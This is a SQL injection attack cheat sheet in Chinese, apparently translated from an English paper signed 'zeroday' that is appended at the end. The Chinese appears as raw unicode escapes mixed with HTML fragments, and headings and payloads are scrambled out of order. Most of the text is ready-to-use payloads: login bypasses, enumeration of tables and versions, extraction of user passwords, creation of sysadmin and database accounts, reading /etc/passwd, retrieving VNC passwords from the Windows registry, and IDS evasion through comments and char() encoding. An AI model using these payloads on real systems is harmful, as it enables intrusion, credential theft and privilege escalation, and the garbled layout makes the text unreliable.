====||\u76ee\u5f55||=====
--------------------
1\u3001\u7b80\u4ecb
2\u3001\u6f0f\u6d1e\u6d4b\u8bd5
3\u3001\u6536\u96c6\u4fe1\u606f
4\u3001\u6570\u636e\u7c7b\u578b
5\u3001\u6293\u53d6\u5bc6\u7801
6\u3001\u521b\u5efa\u6570\u636e\u5e93\u5e10\u53f7
7\u3001MYSQL\u5229\u7528
8\u3001\u670d\u52a1\u540d\u548c\u914d\u7f6e
9\u3001\u5728\u6ce8\u518c\u8868\u4e2d\u627eVNC\u5bc6\u7801
10\u3001\u523a\u7a7fIDS\u8ba4\u8bc1
11\u3001\u5728MYSQL\u4e2d\u4f7f\u7528char()\u6b3a\u9a97
12\u3001\u7528\u6ce8\u91ca\u8eb2\u907fIDS\u8ba4\u8bc1
13\u3001\u6784\u9020\u65e0\u5f15\u53f7\u7684\u5b57\u7b26\u4e32<\/p>\n
====||\u6587\u7ae0\u5f00\u59cb||====<\/p>\n
1\u3001\u7b80\u4ecb<\/p>\n
\u5f53\u4f60\u770b\u5230\u4e00\u4e2a\u670d\u52a1\u5668\u53ea\u5f00\u4e8680\u7aef\u53e3\uff0c\u8fd9\u5728\u4e00\u5b9a\u7a0b\u5ea6\u4e0a\u8bf4\u660e\u7ba1\u7406\u5458\u628a\u7cfb\u7edf\u7684\u8865\u4e01\u505a\u7684\u5f88\u597d\uff0c\u6211\u4eec\u6240\u8981\u505a\u6700\u6709\u6548\u7684\u653b\u51fb\u5219\u4e5f\u5e94\u8be5\u8f6c\u5411WEB\u653b\u51fb\u3002SQL\u6ce8\u5c04\u662f\u6700\u5e38\u7528\u7684\u653b\u51fb\u65b9\u5f0f\u3002\u4f60\u653b\u51fbWEN\u7cfb\u7edf\uff08ASP\uff0cPHP\uff0cJSP\uff0cCGI\u7b49\uff09\u6bd4\u53bb\u653b\u51fb\u7cfb\u7edf\u6216\u8005\u5176\u4ed6\u7684\u7cfb\u7edf\u670d\u52a1\u8981\u7b80\u5355\u7684\u591a\u3002
SQL\u6ce8\u5c04\u662f\u901a\u8fc7\u9875\u9762\u4e2d\u7684\u8f93\u5165\u6765\u6b3a\u9a97\u4f7f\u5f97\u5176\u53ef\u4ee5\u8fd0\u884c\u6211\u4eec\u6784\u9020\u7684\u67e5\u8be2\u6216\u8005\u522b\u7684\u547d\u4ee4\uff0c\u6211\u4eec\u77e5\u9053\u5728WEB\u4e0a\u9762\u6709\u5f88\u591a\u4f9b\u6211\u4eec\u8f93\u5165\u53c2\u6570\u7684\u5730\u65b9\uff0c\u6bd4\u5982\u7528\u6237\u540d\u3001\u5bc6\u7801\u6216\u8005E_mail\u3002<\/p>\n
2\u3001\u6f0f\u6d1e\u6d4b\u8bd5<\/p>\n
\u6700\u5f00\u59cb\u6211\u4eec\u5e94\u8be5\u4ece\u6700\u7b80\u5355\u7684\u6765\u8bd5\uff1a<\/p>\n
- Login:' or 1=1-- \u8fd8\u6709\u4e0b\u9762\u8fd9\u6837\u7684\u65b9\u5f0f\uff1a<\/p>\n - ' having 1=1-- 3\u3001\u6536\u96c6\u4fe1\u606f<\/p>\n - ' or 1 in (select @@version)-- \u4e0a\u9762\u5c31\u53ef\u4ee5\u5f97\u5230\u7cfb\u7edf\u7684\u7248\u672c\u548c\u8865\u4e01\u4fe1\u606f\u3002<\/p>\n 4\u3001\u6570\u636e\u7c7b\u578b<\/p>\n Oracle\u6570\u636e\u5e93>> MS access\u6570\u636e MS SQL Server\u6570\u636e\u5e93 5\u3001\u6293\u53d6\u5bc6\u7801<\/p>\n \u7528\u7c7b\u4f3c\u4e0b\u9762\u7684\u8bed\u53e5\u3002\u3002\u3002 6\u3001\u521b\u5efa\u6570\u636e\u5e93\u5e10\u53f7<\/p>\n MS SQL MySQL Access Postgres (requires Unix account) Oracle 7\u3001MYSQL\u4ea4\u4e92\u67e5\u8be2<\/p>\n \u4f7f\u7528Union\u67e5\u8be2\uff0c\u66b4\u51fa\u6587\u4ef6\u4ee3\u7801\uff0c\u5982\u4e0b\uff1a 8\u3001\u7cfb\u7edf\u670d\u52a1\u540d\u548c\u914d\u7f6e<\/p>\n - ' and 1 in (select @@servername)-- 9\u3001\u627e\u5230VNC\u5bc6\u7801\uff08\u6ce8\u518c\u8868\uff09<\/p>\n \u5b9e\u9a8c\u8bed\u53e5\u5982\u4e0b\uff1a<\/p>\n - '; declare @out binary(8) 10\u3001\u907f\u5f00IDS\u68c0\u6d4b<\/p>\n Evading ' OR 1=1 Signature<\/p>\n - ' OR 'unusual' = 'unusual' 11\u3001MYSQL\u4e2d\u4f7f\u7528char()\u51fd\u6570<\/p>\n \u4e0d\u5e26\u5f15\u53f7\u7684\u6ce8\u5c04\uff0c\u4f8b\u5982\uff1a (string = "%"): 12\u3001\u5229\u7528\u6ce8\u91ca\u7b26\u53f7\u907f\u5f00IDS<\/p>\n \u4e3e\u4f8b\u5982\u4e0b\uff1a<\/p>\n -->'\/**\/OR\/**\/1\/**\/=\/**\/1 13\u3001\u4e0d\u5e26\u5f15\u53f7\u7684\u5b57\u7b26\u4e32<\/p>\n \u7528char()\u6216\u80050X\u6765\u6784\u9020\u4e0d\u542b\u5f15\u53f7\u7684\u8bed\u53e5\u3002\u3002 ======================================================================<\/p>\n \u9644\u5f55\u539f\u6587\uff1a<\/p>\n Sql Injection Paper 1.Introduction. 1. When a box only has port 80 open, it's almost certain the admin will patch his server,
- Pass:' or 1=1--
- http:\/\/website\/index.asp?id='<\/a>
\n or 1=1-- <\/p>\n
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--<\/p>\n
- ' union all select @@version--<\/p>\n
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL\u6570\u636e\u5e93
-->mysql.user
-->mysql.host
-->mysql.db<\/p>\n
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships<\/p>\n
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases<\/p>\n
\/\/\u4fdd\u5b58\u67e5\u8be2\u7684\u7ed3\u679c
step1 : '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'\/'+password+' ' from users where login > @var select @var as var into temp end --
\/\/\u53d6\u5f97\u4fe1\u606f
step2 : ' and 1 in (select var from temp)--
\/\/\u5220\u9664\u4e34\u65f6\u8868
step3 : ' ; drop table temp --<\/p>\n
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'<\/p>\n
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))<\/p>\n
CRATE USER name IDENTIFIED BY 'pass123'<\/p>\n
CRATE USER name WITH PASSWORD 'pass123'<\/p>\n
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;<\/p>\n
- ' union select 1,load_file('\/etc\/passwd'),1,1,1;<\/p>\n
- ' and 1 in (select servername from master.sysservers)--<\/p>\n
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\\ORL\\WinVNC3\\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--<\/p>\n
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3<\/p>\n
--> ' or username like char(37);
\u5e26\u5f15\u53f7\u7684\u6ce8\u5c04\uff0c\u4f8b\u5982\uff1a (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
\u5728 unions\u4e2d\u4f7f\u7528load files \u51fd\u6570\uff0c\u4f8b\u5982\uff1a(string = "\/etc\/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
\u68c0\u67e5\u6587\u4ef6\u662f\u5426\u5b58\u5728\uff0c\u4f8b\u5982\uff1a (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));<\/p>\n
-->Username:' or 1\/*
-->Password:*\/=1--
-->UNI\/**\/ON SEL\/**\/ECT \uff08\uff01\uff01\uff01\u8fd9\u4e2a\u6bd4\u8f83\u7f55\u89c1\uff0c\u5e94\u8be5\u5927\u6709\u4f5c\u4e3a\uff01\uff01\uff01\uff09
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')<\/p>\n
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)<\/p>\n
By zeroday.
zeroday [ at ] blacksecurity.org <\/p>\n
2.Testing for vulnerabilities.
3.Gathering Information.
4.Data types.
5.Grabbing Passwords.
6.Create DB accounts.
7.MySQL OS Interaction.
8.Server name and config.
9.Retrieving VNC password from registry.
10.IDS Signature Evasion.
11.mySQL Input Validation Circumvention using Char().
12.IDS Signature Evasion using comments.
13.Strings without quotes.<\/p>\n
The best thing to turn to is web attacks. Sql Injection is one of the most common web attacks.
You attack the web application, ( ASP, JSP, PHP, CGI..etc) rather than the webserver
or the services running on the OS.
Sql injection is a way to trick using a qurey or command as a input via webpages,
most websites take parameters from the user like username and passwrod or even their emails.
They all use Sql querys.<\/p>\n